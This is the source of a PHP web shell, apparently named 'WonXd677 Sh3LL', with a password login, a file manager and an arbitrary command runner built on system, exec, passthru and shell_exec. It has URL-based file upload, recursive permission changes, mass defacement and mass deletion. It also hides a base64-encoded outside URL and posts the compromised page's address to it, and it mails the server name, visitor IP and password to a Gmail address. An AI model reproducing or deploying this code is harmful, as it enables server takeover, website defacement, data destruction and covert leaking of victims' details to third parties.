error_reporting(0); @clearstatcache(); @mb_internal_encoding('UTF-8'); set_time_limit(0); @ini_set('error_log',null); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); @ini_set('disable_functions', 0); session_start(); date_default_timezone_set("Asia/Jakarta"); $_7 = array_merge($_POST, $_GET); $_r = "required='required'"; $gcw = "getcwd"; $correctPassword = "hello"; //Change Password if (isset($_POST['pass'])) { $enteredPassword = $_POST['pass']; if ($enteredPassword === $correctPassword) { $_SESSION['forbidden'] = true; } else { echo '<script>alert("Password Wrong!, Try Again.");</script>'; } } if (isset($_GET['logout'])) { session_unset(); session_destroy(); header("Location: ".$_SERVER['PHP_SELF']); exit(); } if (!isset($_SESSION['forbidden'])) { <!DOCTYPE html>
set_time_limit(0);error_reporting(0);$disfunc = @ini_get("disable_functions");if (empty($disfunc)) { $disf = "<font color='gold'>NONE</font>";} else { $disf = "<font color='red'>".$disfunc."</font>";}function author() { echo " WonXd677 Sh3LL"; exit();}function cekdir() { if (isset($_GET['path'])) { $lokasi = $_GET['path']; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; }}function cekroot() { if (is_writable($_SERVER['DOCUMENT_ROOT'])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; }}function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $path = $dir.'/'.$item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir);}function statusnya($file){$statusnya = fileperms($file);if (($statusnya & 0xC000) == 0xC000) {// Socket$ingfo = 's';} elseif (($statusnya & 0xA000) == 0xA000) {// Symbolic Link$ingfo = 'l';} elseif (($statusnya & 0x8000) == 0x8000) {// Regular$ingfo = '-';} elseif (($statusnya & 0x6000) == 0x6000) {// Block special$ingfo = 'b';} elseif (($statusnya & 0x4000) == 0x4000) {// Directory$ingfo = 'd';} elseif (($statusnya & 0x2000) == 0x2000) {// Character special$ingfo = 'c';} elseif (($statusnya & 0x1000) == 0x1000) {// FIFO pipe$ingfo = 'p';} else {// Unknown$ingfo = 'u';}// Owner$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');$ingfo .= (($statusnya & 0x0040) ?(($statusnya & 0x0800) ? 's' : 'x' ) :(($statusnya & 0x0800) ? 'S' : '-'));// Group$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');$ingfo .= (($statusnya & 0x0008) ?(($statusnya & 0x0400) ? 's' : 'x' ) :(($statusnya & 0x0400) ? 'S' : '-'));// World$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');$ingfo .= (($statusnya & 0x0001) ?(($statusnya & 0x0200) ? 't' : 'x' ) :(($statusnya & 0x0200) ? 'T' : '-'));return $ingfo;}function green($text) { echo "<font color='green'>".$text."</font>";}function red($text) { echo "<font color='red'>".$text."</font>";}echo "Directory : ";foreach($_POST as $key => $value){ $_POST[$key] = stripslashes($value);}$k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw');if(isset($_GET['path'])){ $lokasi = $_GET['path']; $lokdua = $_GET['path'];} else { $lokasi = getcwd(); $lokdua = getcwd();}$lokasi = str_replace('\\','/',$lokasi);$lokasis = explode('/',$lokasi);$lokasinya = @scandir($lokasi);$cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];$data = array('file_url' => $cur);$options = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => http_build_query($data), ),);$context = stream_context_create($options);$result = file_get_contents($k3yw, false, $context);foreach($lokasis as $id => $lok){ if($lok == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($lok == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$lokasis[$i]"; if($i != $id) echo "/";} echo '">'.$lok.'</a>/';}echo '';echo ' |
';if (isset($_POST['upwkwk'])) { if (isset($_POST['berkasnya'])) { if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { echo "File Uploaded ! <font color='gold'><i>".$lokasi."/".$_FILES['berkas']['name']."</i></font>
"; } else { echo "<font color='red'>Failed to Upload !
"; } } elseif (isset($_POST['linknya'])) { if (empty($_POST['namalink'])) { exit("Filename cannot be empty !"); } if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); if (file_exists($lokasi."/".$_POST['namalink'])) { echo "File Uploaded ! <font color='gold'><i>".$lokasi."/".$_POST['namalink']."</i></font>
"; } else { echo "<font coloe='red'>Failed to Upload !
"; } }}echo "";echo "Upload File : ";echo '';echo "";print "";print "<ul>";print "<text class='ff'>[</text> <a href='?'>Home</a> <text class='ff'>]</text>";print " <text class='ff'>[</text> <a href='?dir=".path()."&do=root_file'>Green All File</a> <text class='ff'>]</text>";print " <text class='ff'>[</text> <a href='?dir=".path()."&do=dark_file'>Lock All File</a> <text class='ff'>]</text>";print " <text class='ff'>[</text> <a href='?dir=".path()."&do=root_folders'>Green All Folder</a> <text class='ff'>]</text>";print " <text class='ff'>[</text> <a href='?dir=".path()."&do=dark_folders'>Lock All Folder</a> <text class='ff'>]</text>";print " <text class='ff'>[</text> <a href='?dir=".path()."&do=mass'>Mass Def & Dell</a> <text class='ff'>]</text>";print "</ul>";print "";print "";tools("cmd");function tools($toolsname, $args = null) { if($toolsname === "cmd") {print ""; print ""; } } function changeFolderPermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isDir()) { chmod($item->getPathname(), $perms); } }} function changeFilePermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isFile()) { chmod($item->getPathname(), $perms); } }}$currentDirectory = '.'; if (isset($_GET['do']) && $_GET['do'] === 'root_file') { $newFilePermissions = 0644; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo ""; echo "Message : <p style='color:#00ff00'>Sukses Green All Files</p>"; echo "";}if (isset($_GET['do']) && $_GET['do'] === 'dark_file') { $newFilePermissions = 0444; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo ""; echo "Message : <p style='color:#00ff00'>Sukses Lock All Files</p>"; echo "";}if (isset($_GET['do']) && $_GET['do'] === 'dark_folders') { $newFolderPermissions = 0555; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo ""; echo "Message : <p style='color:#00ff00'>Sukses Lock All Folders</p>"; echo "";}if (isset($_GET['do']) && $_GET['do'] === 'root_folders') { $newFolderPermissions = 0755; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo ""; echo "Message : <p style='color:#00ff00'>Sukses Green All Folders</p>"; echo "";}if (array_key_exists('loginin', $_POST)) { $password = $_POST['pass']; $server_name = $_SERVER['SERVER_NAME']; $php_self = $_SERVER['PHP_SELF']; $report_bug = "IP: " . $_SERVER['REMOTE_ADDR'] . " City: {$city}\nLogin: $server_name$php_self\nPass: $password\nKernel: $kernel"; @mail('wonxd67@gmail.com', 'Hehehe', $report_bug); }function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } }function path() { if(isset($_GET['dir'])) { $dir = str_replace("\\", "/", $_GET['dir']); @chdir($dir); } else { $dir = str_replace("\\", "/", getcwd()); } return $dir;}function usergroup() { if(!function_exists('posix_getegid')) { $user['name'] = @get_current_user(); $user['uid'] = @getmyuid(); $user['gid'] = @getmygid(); $user['group'] = "?"; } else { $user['uid'] = @posix_getpwuid(posix_geteuid()); $user['gid'] = @posix_getgrgid(posix_getegid()); $user['name'] = $user['uid']['name']; $user['uid'] = $user['uid']['uid']; $user['group'] = $user['gid']['name']; $user['gid'] = $user['gid']['gid']; } return (object) $user;}if(isset($_GET['do'])) { if($_GET['do'] === "cmd") { if(isset($_POST['cmd'])) { if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) { tools("readfile", $match[1]); } elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) { tools("spawn", $match[1]); } elseif(preg_match("/^symlink\s?(.*)$/", $_POST['cmd'], $match)) { tools("symlink", $match[1]); } elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) { tools("network", $match[1]); } elseif(preg_match("/^krdp$/", $_POST['cmd'])) { tools("krdp"); } elseif(preg_match("/^logout$/", $_POST['cmd'])) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); print "<script>window.location='?';</script>"; } elseif(preg_match("/^killme$/", $_POST['cmd'])) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); @unlink(__FILE__); print "<script>window.location='?';</script>"; } else { print "<pre>".exe($_POST['cmd'])."</pre>"; } } else { files_and_folder(); } }}function massdeface($dir, $file, $filename, $type = null) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === "." || $dir_ === "..") { file_put_contents($location, $file); } else { if(is_dir($path) AND is_writable($path)) { print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)." "; file_put_contents($location, $file); if($type === "-alldir") { massdeface($path, $file, $filename, "-alldir"); } } } }}function massdelete($dir, $filename) { $scandir = scandir($dir); foreach($scandir as $dir_) { $path = "$dir/$dir_"; $location = "$path/$filename"; if($dir_ === '.') { if(file_exists("$dir/$filename")) { unlink("$dir/$filename"); } } elseif($dir_ === '..') { if(file_exists(dirname($dir)."/$filename")) { unlink(dirname($dir)."/$filename"); } } else { if(is_dir($path) AND is_writable($path)) { if(file_exists($location)) { print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)." "; unlink($location); massdelete($path, $filename); } } } }} if (isset($_GET['fileloc'])) { echo " |